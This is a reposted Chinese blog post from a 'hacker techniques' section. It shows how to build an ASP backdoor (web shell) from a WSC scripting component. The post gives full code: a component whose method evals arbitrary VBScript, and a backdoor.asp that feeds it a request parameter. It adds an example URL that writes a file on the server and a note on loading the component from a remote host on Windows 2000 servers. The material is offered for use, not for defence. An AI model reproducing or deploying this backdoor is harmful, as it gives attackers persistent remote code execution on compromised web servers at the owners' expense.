=波波日志 > 黑客技术 > 利用wsc 来做一个asp后门=

[转]利用wsc 来做一个asp后门

ScriptCodingInfo.wsc代码如下,该文件可以改成任意后缀

<?xml version="1.0" encoding="gb2312" standalone="yes"?>

<?component error="true" debug="true"?>

<package>

<component id="haiyangtop">

<public>
<method name="lcx"><parameter name="b"/></method>
</public>

<script language="VBScript"><![CDATA[

sub lcx(b)
   eval(b)
  
end sub

]]>
</script>

</component>
</package>

backdoor.asp内容如下:

<%
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>

调用方法如下:http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")

注意这里的a=只能是vbs的代码,不可以接受像response、rquest之类的asp的东东。

如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc,像

Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop"),2003服务器中不可以。



http://hi.baidu.com/isbx/blog/item/f767023b12199aed14cecbd4.html
类别:黑客技术 作者:转载 日期:2009-09-01 【评论:0】 
 
暂时没有评论!
发表留言
  • *昵称:
  • 头像:
  • 电子邮件: [留下您的邮件,方便管理员回复您。]
  • 个人网站: *验证码:
声明:本网站尊重并保护知识产权,根据《信息网络传播权保护条例》,如果我们转载或引用的作品侵犯了您的权利,请通知我们,我们会及时删除!
Powered by showbo,©2012WEB编程网桂ICP备05005887号 京公网安备1101055090